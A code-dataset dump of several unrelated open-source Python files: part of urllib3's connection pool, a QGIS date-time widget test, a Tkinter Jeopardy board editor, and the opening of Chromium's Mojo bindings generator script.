except (TimeoutError, HTTPException, SocketError, ProtocolError) as e:
# Discard the connection for these exceptions. It will be
# be replaced during the next _get_conn() call.
clean_exit = False
if isinstance(e, (SocketError, NewConnectionError)) and self.proxy:
e = ProxyError('Cannot connect to proxy.', e)
elif isinstance(e, (SocketError, HTTPException)):
e = ProtocolError('Connection aborted.', e)
retries = retries.increment(method, url, error=e, _pool=self,
_stacktrace=sys.exc_info()[2])
retries.sleep()
# Keep track of the error for the retry warning.
err = e
finally:
if not clean_exit:
# We hit some kind of exception, handled or otherwise. We need
# to throw the connection away unless explicitly told not to.
# Close the connection, set the variable to None, and make sure
# we put the None back in the pool to avoid leaking it.
conn = conn and conn.close()
release_this_conn = True
if release_this_conn:
# Put the connection back to be reused. If the connection is
# expired then it will be None, which will get replaced with a
# fresh connection during _get_conn.
self._put_conn(conn)
if not conn:
# Try again
log.warning("Retrying (%r) after connection "
"broken by '%r': %s", retries, err, url)
return self.urlopen(method, url, body, headers, retries,
redirect, assert_same_host,
timeout=timeout, pool_timeout=pool_timeout,
release_conn=release_conn, **response_kw)
# Handle redirect?
redirect_location = redirect and response.get_redirect_location()
if redirect_location:
if response.status == 303:
method = 'GET'
try:
retries = retries.increment(method, url, response=response, _pool=self)
except MaxRetryError:
if retries.raise_on_redirect:
# Release the connection for this response, since we're not
# returning it to be released manually.
response.release_conn()
raise
return response
log.info("Redirecting %s -> %s", url, redirect_location)
return self.urlopen(
method, redirect_location, body, headers,
retries=retries, redirect=redirect,
assert_same_host=assert_same_host,
timeout=timeout, pool_timeout=pool_timeout,
release_conn=release_conn, **response_kw)
# Check if we should retry the HTTP response.
if retries.is_forced_retry(method, status_code=response.status):
try:
retries = retries.increment(method, url, response=response, _pool=self)
except MaxRetryError:
if retries.raise_on_status:
# Release the connection for this response, since we're not
# returning it to be released manually.
response.release_conn()
raise
return response
retries.sleep()
log.info("Forced retry: %s", url)
return self.urlopen(
method, url, body, headers,
retries=retries, redirect=redirect,
assert_same_host=assert_same_host,
timeout=timeout, pool_timeout=pool_timeout,
release_conn=release_conn, **response_kw)
return response
class HTTPSConnectionPool(HTTPConnectionPool):
"""
Same as :class:`.HTTPConnectionPool`, but HTTPS.
When Python is compiled with the :mod:`ssl` module, then
:class:`.VerifiedHTTPSConnection` is used, which *can* verify certificates,
instead of :class:`.HTTPSConnection`.
:class:`.VerifiedHTTPSConnection` uses one of ``assert_fingerprint``,
``assert_hostname`` and ``host`` in this order to verify connections.
If ``assert_hostname`` is False, no verification is done.
The ``key_file``, ``cert_file``, ``cert_reqs``, ``ca_certs``,
``ca_cert_dir``, and ``ssl_version`` are only used if :mod:`ssl` is
available and are fed into :meth:`urllib3.util.ssl_wrap_socket` to upgrade
the connection socket into an SSL socket.
"""
scheme = 'https'
ConnectionCls = HTTPSConnection
def __init__(self, host, port=None,
strict=False, timeout=Timeout.DEFAULT_TIMEOUT, maxsize=1,
block=False, headers=None, retries=None,
_proxy=None, _proxy_headers=None,
key_file=None, cert_file=None, cert_reqs=None,
ca_certs=None, ssl_version=None,
assert_hostname=None, assert_fingerprint=None,
ca_cert_dir=None, **conn_kw):
HTTPConnectionPool.__init__(self, host, port, strict, timeout, maxsize,
block, headers, retries, _proxy, _proxy_headers,
**conn_kw)
if ca_certs and cert_reqs is None:
cert_reqs = 'CERT_REQUIRED'
self.key_file = key_file
self.cert_file = cert_file
self.cert_reqs = cert_reqs
self.ca_certs = ca_certs
self.ca_cert_dir = ca_cert_dir
self.ssl_version = ssl_version
self.assert_hostname = assert_hostname
self.assert_fingerprint = assert_fingerprint
def _prepare_conn(self, conn):
"""
Prepare the ``connection`` for :meth:`urllib3.util.ssl_wrap_socket`
and establish the tunnel if proxy is used.
"""
if isinstance(conn, VerifiedHTTPSConnection):
conn.set_cert(key_file=self.key_file,
cert_file=self.cert_file,
cert_reqs=self.cert_reqs,
ca_certs=self.ca_certs,
ca_cert_dir=self.ca_cert_dir,
assert_hostname=self.assert_hostname,
assert_fingerprint=self.assert_fingerprint)
conn.ssl_version = self.ssl_version
return conn
def _prepare_proxy(self, conn):
"""
Establish tunnel connection early, because otherwise httplib
would improperly set Host: header to proxy's IP:port.
"""
# Python 2.7+
try:
set_tunnel = conn.set_tunnel
except AttributeError: # Platform-specific: Python 2.6
set_tunnel = conn._set_tunnel
if sys.version_info <= (2, 6, 4) and not self.proxy_headers: # Python 2.6.4 and older
set_tunnel(self.host, self.port)
else:
set_tunnel(self.host, self.port, self.proxy_headers)
conn.connect()
def _new_conn(self):
"""
Return a fresh :class:`httplib.HTTPSConnection`.
"""
self.num_connections += 1
log.info("Starting new HTTPS connection (%d): %s",
self.num_connections, self.host)
if not self.ConnectionCls or self.ConnectionCls is DummyConnection:
raise SSLError("Can't connect to HTTPS URL because the SSL "
"module is not available.")
actual_host = self.host
actual_port = self.port
if self.proxy is not None:
actual_host = self.proxy.host
actual_port = self.proxy.port
conn = self.ConnectionCls(host=actual_host, port=actual_port,
timeout=self.timeout.connect_timeout,
strict=self.strict, **self.conn_kw)
return self._prepare_conn(conn)
def _validate_conn(self, conn):
"""
Called right before a request is made, after the socket is created.
"""
super(HTTPSConnectionPool, self)._validate_conn(conn)
# Force connect early to allow us to validate the connection.
if not getattr(conn, 'sock', None): # AppEngine might not have `.sock`
conn.connect()
if not conn.is_verified:
warnings.warn((
'Unverified HTTPS request is being made. '
'Adding certificate verification is strongly advised. See: '
'https://urllib3.readthedocs.io/en/latest/security.html'),
InsecureRequestWarning)
def connection_from_url(url, **kw):
"""
Given a url, return an :class:`.ConnectionPool` instance of its host.
This is a shortcut for not having to parse out the scheme, host, and port
of the url before creating an :class:`.ConnectionPool` instance.
:param url:
Absolute URL string that must include the scheme. Port is optional.
:param \**kw:
Passes additional parameters to the constructor of the appropriate
:class:`.ConnectionPool`. Useful for specifying things like
timeout, maxsize, headers, etc.
Example::
>>> conn = connection_from_url('http://google.com/')
>>> r = conn.request('GET', '/')
"""
scheme, host, port = get_host(url)
port = port or port_by_scheme.get(scheme, 80)
if scheme == 'https':
return HTTPSConnectionPool(host, port=port, **kw)
else:
return HTTPConnectionPool(host, port=port, **kw)
| gpl-3.0 | 1,888,680,584,847,331,600 | 37.788684 | 99 | 0.595755 | false |
minorua/QGIS | tests/src/python/test_qgsdatetimeedit.py | 12 | 1643 | # -*- coding: utf-8 -*-
"""QGIS Unit tests for QgsDateTimeEdit
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
__author__ = 'Denis Rouzaud'
__date__ = '2018-01-04'
__copyright__ = 'Copyright 2017, The QGIS Project'
import qgis # NOQA
from qgis.gui import QgsDateTimeEdit
from qgis.PyQt.QtCore import Qt, QDateTime
from qgis.testing import start_app, unittest
start_app()
DATE = QDateTime.fromString('2018-01-01 01:02:03', Qt.ISODate)
class TestQgsDateTimeEdit(unittest.TestCase):
def testSettersGetters(self):
""" test widget handling of null values """
w = qgis.gui.QgsDateTimeEdit()
w.setAllowNull(False)
w.setDateTime(DATE)
self.assertEqual(DATE, w.dateTime())
# date should remain when setting an invalid date
w.setDateTime(QDateTime())
self.assertEqual(DATE, w.dateTime())
def testNullValueHandling(self):
""" test widget handling of null values """
w = qgis.gui.QgsDateTimeEdit()
w.setAllowNull(True)
# date should be valid again when not allowing NULL values
w.setDateTime(QDateTime())
w.setAllowNull(False)
self.assertTrue(w.dateTime().isValid())
w.setAllowNull(True)
w.setDateTime(QDateTime())
self.assertFalse(w.dateTime().isValid())
w.setAllowNull(False)
self.assertTrue(w.dateTime().isValid())
if __name__ == '__main__':
unittest.main()
| gpl-2.0 | -8,846,367,499,604,521,000 | 28.339286 | 78 | 0.667681 | false |
WolfgangAxel/ConGames | Python-Jeopardy/Editor.py | 1 | 18974 | #!/usr/bin/python
# -*- coding: iso-8859-1 -*-
import Tkinter,tkFont
import math
import glob
import os
class simpleapp_tk(Tkinter.Tk):
def __init__(self,parent):
Tkinter.Tk.__init__(self,parent)
self.parent = parent
self.initialize()
def initialize(self):
self.grid()
self.HOME = os.getcwd()
if not os.path.exists(self.HOME+'/.PythonJeopardy'):
os.mkdir(self.HOME+'/.PythonJeopardy')
if not os.path.exists(self.HOME+'/.PythonJeopardy/Default'):
f=open(self.HOME+'/.PythonJeopardy/Default','w')
ABP=[]
for i,cat in enumerate(["Category 1","Category 2","Category 3","Category 4","Category 5"]):
for ques in range(1,6):
exec('q="A question"')
exec('a="An Answer"')
exec('i=""')
exec('B'+str(ques)+'=[q,a,i]')
exec('C'+str(i)+'=[B1,B2,B3,B4,B5]')
exec('ABP.append(["'+cat+'",C'+str(i)+'])')
P=[100,200,300,400,500]
board = [ABP,P]
f.write(str(board)+'\n')
for i,item in enumerate(P):
P[i]=item*2
board = [ABP,P]
f.write(str(board)+'\n')
f.write("['A Category', 'A Question', 'An Answer', '']")
f.close()
self.ent=Tkinter.StringVar()
self.Font = tkFont.Font(family="system",size=12)
##############
self.menya = Tkinter.Menu(self)
self.menya.add_command(label="New", command=self.StartAnew)
self.menya.OpenMenu = Tkinter.Menu(self.menya,tearoff=0)
self.menya.savemen = Tkinter.Menu(self.menya,tearoff=0)
self.menya.savemen.board=Tkinter.Menu(self.menya,tearoff=0)
self.menya.savemen.board.add_command(label="Save to new file",command=self.RawSave)
self.menya.savemen.forread=Tkinter.Menu(self.menya,tearoff=0)
self.menya.savemen.forread.add_command(label="Save to new file",command=self.ReadSave)
for i,name in enumerate(glob.glob(self.HOME+'/.PythonJeopardy/*.board')):
if name:
exec('def Open'+str(i)+'():'+
'\n app.OpenFile ="'+name+'"'+
'\n app.Round=1'+
'\n app.fileName = app.OpenFile.replace(app.HOME+"/.PythonJeopardy/","")'+
'\n app.fileName = app.fileName.replace(".board","")'+
'\n app.arrayload()')
exec('self.menya.OpenMenu.add_command(label="'+name+'", command=Open'+str(i)+')')
exec('def Save'+str(i)+'():'+
'\n app.SaveFile ="'+name+'"'+
'\n app.RawSave()')
exec('self.menya.savemen.board.add_command(label="'+name+'", command=Save'+str(i)+')')
else:
self.OpenMenu.add_command(label="{None Found}")
for i,name in enumerate(glob.glob(self.HOME+'/.PythonJeopardy/*.txt')):
if name:
exec('def SaveR'+str(i)+'():'+
'\n app.SaveFile ="'+name+'"'+
'\n app.ReadSave()')
exec('self.menya.savemen.forread.add_command(label="'+name+'", command=SaveR'+str(i)+')')
self.menya.add_cascade(label="Open",menu=self.menya.OpenMenu)
self.menya.savemen.add_cascade(label="Save .board file", menu=self.menya.savemen.board)
self.menya.savemen.add_cascade(label="Export Readable .txt File", menu=self.menya.savemen.forread)
self.menya.Round = Tkinter.Menu(self.menya,tearoff=0)
for Round in [1,2,3]:
exec('self.menya.Round.add_command(label="Round '+str(Round)+'",command=self.loadround'+str(Round)+')')
self.menya.add_cascade(label="Save",menu=self.menya.savemen)
self.menya.add_cascade(label="Round",menu=self.menya.Round)
self.menya.add_command(label="Change Point Values", command=self.pointass)
self.menya.add_command(label="Auto Font Size",command=self.fontadj)
self.config(menu=self.menya)
##############
for RND in ["R1","R2"]:
exec('self.'+RND+'=Tkinter.Frame(self)')
for cat in range(0,5):
exec('self.'+RND+'.cat'+str(cat)+'=Tkinter.StringVar()')
exec('self.'+RND+'.catscroll'+str(cat)+'=Tkinter.Scrollbar(self.'+RND+')')
exec('self.'+RND+'.catlab'+str(cat)+' = Tkinter.Entry(self.'+RND+',textvariable=self.'+RND+'.cat'+str(cat)+',font=self.Font,width='+str(self.winfo_width()/5)+',xscrollcommand=self.'+RND+'.catscroll'+str(cat)+'.set)')
exec('self.'+RND+'.catscroll'+str(cat)+'.config(command=self.'+RND+'.catlab'+str(cat)+'.xview)')
exec('self.'+RND+'.catscroll'+str(cat)+'.grid()')
exec('self.'+RND+'.catlab'+str(cat)+'.grid(column='+str(cat)+',row=0,sticky="NSEW")')
for ques in range(1,6):
exec('self.'+RND+'.box'+str(cat)+'x'+str(ques)+' = Tkinter.Button(self.'+RND+',command=self.reveal'+str(cat)+'x'+str(ques)+',font=self.Font,width='+str(self.winfo_width()/5)+')')
exec('self.'+RND+'.box'+str(cat)+'x'+str(ques)+'.grid(column='+str(cat)+',row='+str(ques)+',sticky="NSEW")')
for i in range(0,6):
if i<5:
exec('self.'+RND+'.grid_columnconfigure('+str(i)+',weight=1)')
exec('self.'+RND+'.grid_rowconfigure('+str(i)+',weight=1)')
self.R3 = Tkinter.Frame(self)
##############
self.StartAnew()
self.grid_columnconfigure(0,weight=1)
self.grid_rowconfigure(0,weight=1)
self.resizable(True,True)
self.update()
self.geometry(self.geometry())
####################################################################
def savegame(self):
self.savename = Tkinter.Toplevel(self)
self.savename.wm_title("Enter a name to save the file as")
self.savename.entbox=Tkinter.Entry(self.savename,textvariable=self.ent)
self.savename.entbox.grid(column=0,row=0,sticky="NSEW")
self.savename.proceed=Tkinter.Button(self.savename,text="Save",command=self.arraysave)
self.savename.proceed.grid(column=1,row=0,sticky="NSEW")
def arrayload(self):
self.ent.set(self.fileName)
f=open(self.OpenFile,'r')
self.sepf = f.readlines()
for Round in [1,2]:
self.clusterfuck = {}
self.clusterfuck = eval(str(self.sepf[Round-1]))
self.P=eval(str(self.clusterfuck[1]))
for cat in range(0,5):
exec('self.R'+str(Round)+'.cat'+str(cat)+'.set("'+str(eval(str(eval(str(self.clusterfuck[0]))[cat]))[0])+'")')
for ques in range(1,6):
exec('self.ed'+str(cat)+'x'+str(ques)+'R'+str(Round)+' = Tkinter.Frame(self)')
exec('self.R'+str(Round)+'.box'+str(cat)+'x'+str(ques)+'.config(text=eval(str(self.P['+str(ques-1)+'])))')
##################################
exec('self.ed'+str(cat)+'x'+str(ques)+'R'+str(Round)+'.imagefile = Tkinter.StringVar()')
exec('self.ed'+str(cat)+'x'+str(ques)+'R'+str(Round)+'.imagecheck=Tkinter.Button(self.ed'+str(cat)+'x'+str(ques)+'R'+str(Round)+',text="Add image",command=self.changerelief,font=self.Font)')
exec('self.ed'+str(cat)+'x'+str(ques)+'R'+str(Round)+'.imagecheck.grid(row=1,column=2,sticky="NSEW")')
for i,name in enumerate(["question","answer","image"]):
if name == "image":
if eval('str(eval(str(eval(str(eval(str(eval(str(self.clusterfuck[0]))['+str(cat)+']))[1]))['+str(ques-1)+']))['+str(i)+'])'):
self.CAT,self.QUES,self.Round=cat,ques,Round
self.changerelief()
else:
exec('self.ed'+str(cat)+'x'+str(ques)+'R'+str(Round)+'.'+name+' = Tkinter.StringVar()')
exec('self.ed'+str(cat)+'x'+str(ques)+'R'+str(Round)+'.'+name+'.set(str(eval(str(eval(str(eval(str(eval(str(self.clusterfuck[0]))['+str(cat)+']))[1]))['+str(ques-1)+']))['+str(i)+']))')
exec('self.ed'+str(cat)+'x'+str(ques)+'R'+str(Round)+'.'+name+'entry = Tkinter.Entry(self.ed'+str(cat)+'x'+str(ques)+'R'+str(Round)+',textvariable=self.ed'+str(cat)+'x'+str(ques)+'R'+str(Round)+'.'+name+',font=self.Font)')
exec('self.ed'+str(cat)+'x'+str(ques)+'R'+str(Round)+'.'+name+'entry.grid(column='+str(i)+',row=0,sticky="NSEW")')
exec('self.ed'+str(cat)+'x'+str(ques)+'R'+str(Round)+'.RtB=Tkinter.Button(self.ed'+str(cat)+'x'+str(ques)+'R'+str(Round)+',text="Return to board",command=self.returntoboard,font=self.Font)')
exec('self.ed'+str(cat)+'x'+str(ques)+'R'+str(Round)+'.RtB.grid(row=2,column=0,columnspan=3,sticky="NSEW")')
for x in range(0,2):
exec('self.ed'+str(cat)+'x'+str(ques)+'R'+str(Round)+'.columnconfigure('+str(x)+',weight=1)')
exec('self.ed'+str(cat)+'x'+str(ques)+'R'+str(Round)+'.rowconfigure('+str(x)+',weight=1)')
exec('self.ed'+str(cat)+'x'+str(ques)+'R'+str(Round)+'.rowconfigure(2,weight=1)')
##################################
self.clusterfuck = {}
self.clusterfuck = eval(str(self.sepf[2]))
self.R3.category = Tkinter.StringVar()
self.R3.category.set(self.clusterfuck[0])
self.R3.categoryentry = Tkinter.Entry(self.R3,textvariable=self.R3.category,font=self.Font)
self.R3.categoryentry.grid(column=0,columnspan=3,row=0,sticky="NSEW")
for i,name in enumerate(["question","answer"]):
exec('self.R3.'+name+' = Tkinter.StringVar()')
exec('self.R3.'+name+'.set(self.clusterfuck['+str(i+1)+'])')
exec('self.R3.'+name+'entry = Tkinter.Entry(self.R3,textvariable=self.R3.'+name+',font=self.Font)')
exec('self.R3.'+name+'entry.grid(column='+str(i)+',row=1,sticky="NSEW")')
self.R3.pointsentry = Tkinter.Label(self.R3,text="Final Jeopardy",font=self.Font)
self.R3.pointsentry.grid(column=2,row=1,sticky="NSEW")
self.R3.imagefile = Tkinter.StringVar()
self.R3.imagecheck=Tkinter.Button(self.R3,text="Add image",command=self.changerelief,font=self.Font)
if self.clusterfuck[3]:
self.R3.imagecheck.config(relief="sunken")
self.R3.imagefile.set(str(self.clusterfuck[3]))
self.R3.imagecheck.grid(row=2,column=2,sticky="NSEW")
for x in range(0,2):
exec('self.R3.columnconfigure('+str(x)+',weight=1)')
exec('self.R3.rowconfigure('+str(x)+',weight=1)')
self.R3.rowconfigure(2,weight=1)
self.Round = 1
self.clusterfuck = eval(str(self.sepf[0]))
self.P=eval(str(self.clusterfuck[1]))
self.roundload()
f.close()
def roundload(self):
exec('self.R'+str(self.Round)+'.grid(column=0,row=0,sticky="NSEW")')
def RawSave(self):
if self.SaveFile:
self.fileName = self.SaveFile.replace(self.HOME+"/.PythonJeopardy/","")
self.fileName = self.fileName.replace(".board","")
self.ent.set(self.fileName)
self.extension = ".board"
self.newSaveName()
def ReadSave(self):
if self.SaveFile:
self.fileName = self.SaveFile.replace(self.HOME+"/.PythonJeopardy/","")
self.fileName = self.fileName.replace(".txt","")
self.ent.set(self.fileName)
self.extension = ".txt"
self.newSaveName()
def newSaveName(self):
self.typebox = Tkinter.Toplevel(self)
self.typebox.label = Tkinter.Label(self.typebox,text="Save file at: %s/.PythonJeopardy/" % self.HOME,font=self.Font)
self.typebox.label.grid(row=0,column=0,sticky="NSEW")
self.typebox.entry = Tkinter.Entry(self.typebox,textvariable=self.ent)
self.typebox.entry.grid(row=0,column=1,sticky="NSEW")
self.typebox.labelEx = Tkinter.Label(self.typebox,text="%s" % self.extension)
self.typebox.labelEx.grid(row=0,column=2,sticky="NSEW")
self.typebox.button = Tkinter.Button(self.typebox,text="Save",command=self.preSave)
self.typebox.button.grid(row=0,column=3,sticky="NSEW")
self.typebox.update()
self.typebox.geometry(self.typebox.geometry())
def preSave(self):
self.fileName = self.ent.get() + self.extension
self.startSave()
def startSave(self):
self.SaveFile = self.HOME + "/.PythonJeopardy/" + self.fileName
self.arraysave()
try:
self.typebox.destroy()
except:
annoying = True
def arraysave(self):
f=open(self.SaveFile,'w')
if self.fileName == self.fileName.replace(".txt",""):
for Round in [1,2]:
ABP=[]
for cat in range(0,5):
for ques in range(1,6):
exec('q=self.ed'+str(cat)+'x'+str(ques)+'R'+str(Round)+'.question.get()')
q=q.replace('"','\"')
q=q.replace("'","\'")
exec('a=self.ed'+str(cat)+'x'+str(ques)+'R'+str(Round)+'.answer.get()')
a=a.replace('"','\"')
a=a.replace("'","\'")
exec('if self.ed'+str(cat)+'x'+str(ques)+'R'+str(Round)+'.imagefile.get():'+
'\n if self.ed'+str(cat)+'x'+str(ques)+'R'+str(Round)+'.imagefile.get() != "Type full path to image here":'
'\n i=self.ed'+str(cat)+'x'+str(ques)+'R'+str(Round)+'.imagefile.get()'
'\n else:'+
'\n i=""'+
'\nelse:'+
'\n i=""')
i=i.replace('"','\"')
i=i.replace("'","\'")
exec('B'+str(ques)+'=[q,a,i]')
exec('C'+str(cat)+'=[B1,B2,B3,B4,B5]')
exec('ABP.append([self.R'+str(Round)+'.cat'+str(cat)+'.get(),C'+str(cat)+'])')
Pn=[]
for i,item in enumerate(self.P):
Pn.append(item*Round)
board = [ABP,Pn]
f.write(str(board)+'\n')
c=self.R3.category.get()
c=c.replace('"','\"')
c=c.replace("'","\'")
q=self.R3.question.get()
q=q.replace('"','\"')
q=q.replace("'","\'")
a=self.R3.answer.get()
a=a.replace('"','\"')
a=a.replace("'","\'")
i=self.R3.imagefile.get()
i=i.replace('"','\"')
i=i.replace("'","\'")
ABP=[c,q,a,i]
f.write(str(ABP))
else:
################### I spent entirely too much time making this.
f.writelines( " ____ __ __ ______ __ __ ____ __ __"+"\n"+
" / O |\ \/ //_ __// /_/ // __ | / \/ /"+"\n"+
" / ___/ _\ / / / / __ // /_/ // /\ /"+"\n"+
" /_/ /___/ /_/ /_/ /_/ |____//_/ /_/"+"\n"+
" ________ ______ ____ _____ ___ _____ _____ __ ___"+"\n"+
" /__ __// ___// _ \ / __ \ / | / __ \ / __ \ \ \ / /"+"\n"+
" / / / /__ / / | | / /_/ |/ o | / /_/ | / / | | \ \/ /"+"\n"+
" __ / / / ___// / / / / ____// _ | / _ / / / / /_ \ /"+"\n"+
" / /_/ / / /__ | |_/ / / / / / | | / / | | / /__/ /| |_/ /"+"\n"+
" \_____/ /_____/ \____/ /__/ /__/ |_|/__/ |_|/_______/ \____/"+"\n\n\n")
for Round in [1,2,3]:
if Round <3:
f.writelines(" X><><><><><><><><X\n X Round #%s X\n X><><><><><><><><X\n\n" % Round)
for cat in range(0,5):
exec('f.writelines("Category: "+self.R'+str(Round)+'.cat'+str(cat)+'.get()+"\\n")')
for ques in range(1,6):
exec('f.writelines(str(self.P['+str(ques-1)+']*'+str(Round)+')+": "+self.ed'+str(cat)+'x'+str(ques)+'R'+str(Round)+'.question.get()+"\\n")')
exec('f.writelines(" Answer: "+self.ed'+str(cat)+'x'+str(ques)+'R'+str(Round)+'.answer.get()+"\\n")')
exec('if self.ed'+str(cat)+'x'+str(ques)+'R'+str(Round)+'.imagefile.get():'+
'\n if self.ed'+str(cat)+'x'+str(ques)+'R'+str(self.Round)+'.imagefile.get() != "Type full path to image here":'
'\n f.writelines(" Image: "+self.ed'+str(cat)+'x'+str(ques)+'R'+str(Round)+'.imagefile.get()+"\\n")')
f.writelines("\n")
else:
f.writelines(" X><><><><><><><><X\n X FINAL JEOPARDY X\n X><><><><><><><><X\n\nCategory: %s\n Question: %s\n Answer: %s" % (self.R3.category.get(),self.R3.question.get(),self.R3.answer.get()))
if self.R3.imagefile.get():
if self.R3.imagefile.get() != "Type full path to image here":
f.writelines("\n Image: %s" % self.R3.imagefile.get())
f.close()
def pointass(self):
self.pointbox = Tkinter.Toplevel(self)
self.pointbox.wm_title("Enter point values")
self.pointbox.menya = Tkinter.Menu(self.pointbox)
self.pointbox.menya.add_command(label="Update Points", command=self.pointsave)
self.pointbox.menya.add_command(label="Close", command=self.annoying)
self.pointbox.config(menu=self.pointbox.menya)
for i in range(0,5):
exec('self.pointbox.points'+str(i)+'=Tkinter.IntVar()')
exec('self.pointbox.points'+str(i)+'entry=Tkinter.Entry(self.pointbox,textvariable=self.pointbox.points'+str(i)+')')
exec('self.pointbox.points'+str(i)+'entry.grid(column=0,row='+str(i)+',sticky="NSEW")')
def annoying(self):
self.pointbox.destroy()
def pointsave(self):
for i in range(1,6):
for j in range(0,5):
exec('self.P['+str(j)+']=int(self.pointbox.points'+str(j)+'entry.get())')
exec('self.R'+str(self.Round)+'.box'+str(j)+'x'+str(i)+'.config(text=eval(str(self.P['+str(i-1)+']*'+str(self.Round)+')))')
for Round in [1,2]:
exec('def loadround'+str(Round)+'(self):'+
'\n exec("self.R"+str(self.Round)+".grid_remove()")'+
'\n self.clusterfuck = eval(str(self.sepf['+str(Round-1)+']))'+
'\n self.P=eval(str(self.clusterfuck[1]))'+
'\n self.Round = '+str(Round)+
'\n self.roundload()')
def loadround3(self):
exec("self.R"+str(self.Round)+".grid_remove()")
self.clusterfuck = eval(str(self.sepf[2]))
self.Round = 3
self.roundload()
def fontadj(self):
ws=self.winfo_width()
self.Font.config(size=int(math.ceil(ws/60)))
if self.Round <3:
for cat in range(0,5):
for ques in range(1,6):
exec('self.R'+str(self.Round)+'.box'+str(cat)+'x'+str(ques)+'.config(wraplength='+str(int(math.ceil(ws/5)))+')')
exec('self.R'+str(self.Round)+'.catlab'+str(cat)+'.config(width='+str(int(math.ceil(ws/5)))+')')
for cat in range(0,5):
for ques in range(1,6):
exec('def reveal'+str(cat)+'x'+str(ques)+'(self):'+
'\n self.CAT='+str(cat)+
'\n self.QUES='+str(ques)+
'\n self.PTS=self.P['+str(ques-1)+']'+
'\n self.reveal()')
def reveal(self):
exec('self.R'+str(self.Round)+'.grid_remove()')
exec('self.ed'+str(self.CAT)+'x'+str(self.QUES)+'R'+str(self.Round)+'.pointsentry = Tkinter.Label(self.ed'+str(self.CAT)+'x'+str(self.QUES)+'R'+str(self.Round)+',text=eval(str(self.P['+str(self.QUES-1)+'])),font=self.Font)')
exec('self.ed'+str(self.CAT)+'x'+str(self.QUES)+'R'+str(self.Round)+'.pointsentry.grid(column=2,row=0,sticky="NSEW")')
exec('self.ed'+str(self.CAT)+'x'+str(self.QUES)+'R'+str(self.Round)+'.grid(row=0,column=0,sticky="NSEW")')
def changerelief(self):
if self.Round<3:
exec('FRAME = "self.ed'+str(self.CAT)+'x'+str(self.QUES)+'R'+str(self.Round)+'"')
else:
FRAME = "self.R3"
if eval(FRAME+'.imagecheck.config("relief")[-1]') == "raised":
exec(FRAME+'.imagecheck.config(relief="sunken",text="Remove image")')
exec('if not str(eval(str(eval(str(eval(str(eval(str(self.clusterfuck[0]))['+str(self.CAT)+']))[1]))['+str(self.QUES-1)+']))[2]):'+
'\n '+FRAME+'.imagefile.set("Type full path to image here")'+
'\nelse:'+
'\n '+FRAME+'.imagefile.set(str(eval(str(eval(str(eval(str(eval(str(self.clusterfuck[0]))['+str(self.CAT)+']))[1]))['+str(self.QUES-1)+']))[2]))')
exec(FRAME+'.imageentry = Tkinter.Entry('+FRAME+',textvariable='+FRAME+'.imagefile,font=self.Font)')
if self.Round<3:
exec(FRAME+'.imageentry.grid(row=1,column=0,columnspan=2,sticky="NSEW")')
else:
exec(FRAME+'.imageentry.grid(row=2,column=0,columnspan=2,sticky="NSEW")')
else:
exec(FRAME+'.imagecheck.config(relief="raised",text="Add image")')
exec(FRAME+'.imageentry.grid_remove()')
exec(FRAME+'.imagefile.set("")')
def returntoboard(self):
exec('self.ed'+str(self.CAT)+'x'+str(self.QUES)+'R'+str(self.Round)+'.grid_remove()')
exec('self.R'+str(self.Round)+'.grid(column=0,row=0,sticky="NSEW")')
def StartAnew(self):
self.OpenFile = self.HOME+"/.PythonJeopardy/Default"
self.fileName=""
self.SaveFile = ""
self.arrayload()
if __name__ == "__main__":
app = simpleapp_tk(None)
app.title('Jeopardy Editor')
app.mainloop()
| mit | 722,170,261,903,929,300 | 46.793451 | 229 | 0.591125 | false |
ltilve/ChromiumGStreamerBackend | third_party/mojo/src/mojo/public/tools/bindings/mojom_bindings_generator.py | 3 | 8427 | #!/usr/bin/env python
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""The frontend for the Mojo bindings system."""
import argparse
import imp
import os
import pprint
import sys
# Disable lint check for finding modules:
# pylint: disable=F0401
def _GetDirAbove(dirname):
"""Returns the directory "above" this file containing |dirname| (which must
also be "above" this file)."""
path = os.path.abspath(__file__)
while True:
path, tail = os.path.split(path)
assert tail
if tail == dirname:
return path
# Manually check for the command-line flag. (This isn't quite right, since it
# ignores, e.g., "--", but it's close enough.)
if "--use_bundled_pylibs" in sys.argv[1:]:
sys.path.insert(0, os.path.join(_GetDirAbove("public"), "public/third_party"))
sys.path.insert(0, os.path.join(os.path.dirname(os.path.abspath(__file__)),
"pylib"))
from mojom.error import Error
import mojom.fileutil as fileutil
from mojom.generate.data import OrderedModuleFromData
from mojom.parse.parser import Parse
from mojom.parse.translate import Translate
def LoadGenerators(generators_string):
if not generators_string:
return [] # No generators.
script_dir = os.path.dirname(os.path.abspath(__file__))
generators = []
for generator_name in [s.strip() for s in generators_string.split(",")]:
# "Built-in" generators:
if generator_name.lower() == "c++":
generator_name = os.path.join(script_dir, "generators",
"mojom_cpp_generator.py")
elif generator_name.lower() == "dart":
generator_name = os.path.join(script_dir, "generators",
"mojom_dart_generator.py")
elif generator_name.lower() == "go":
generator_name = os.path.join(script_dir, "generators",
"mojom_go_generator.py")
elif generator_name.lower() == "javascript":
generator_name = os.path.join(script_dir, "generators",
"mojom_js_generator.py")
elif generator_name.lower() == "java":
generator_name = os.path.join(script_dir, "generators",
"mojom_java_generator.py")
elif generator_name.lower() == "python":
generator_name = os.path.join(script_dir, "generators",
"mojom_python_generator.py")
# Specified generator python module:
elif generator_name.endswith(".py"):
pass
else:
print "Unknown generator name %s" % generator_name
sys.exit(1)
generator_module = imp.load_source(os.path.basename(generator_name)[:-3],
generator_name)
generators.append(generator_module)
return generators
def MakeImportStackMessage(imported_filename_stack):
"""Make a (human-readable) message listing a chain of imports. (Returned
string begins with a newline (if nonempty) and does not end with one.)"""
return ''.join(
reversed(["\n %s was imported by %s" % (a, b) for (a, b) in \
zip(imported_filename_stack[1:], imported_filename_stack)]))
def FindImportFile(dir_name, file_name, search_dirs):
for search_dir in [dir_name] + search_dirs:
path = os.path.join(search_dir, file_name)
if os.path.isfile(path):
return path
return os.path.join(dir_name, file_name)
class MojomProcessor(object):
def __init__(self, should_generate):
self._should_generate = should_generate
self._processed_files = {}
self._parsed_files = {}
def ProcessFile(self, args, remaining_args, generator_modules, filename):
self._ParseFileAndImports(filename, args.import_directories, [])
return self._GenerateModule(args, remaining_args, generator_modules,
filename)
def _GenerateModule(self, args, remaining_args, generator_modules, filename):
# Return the already-generated module.
if filename in self._processed_files:
return self._processed_files[filename]
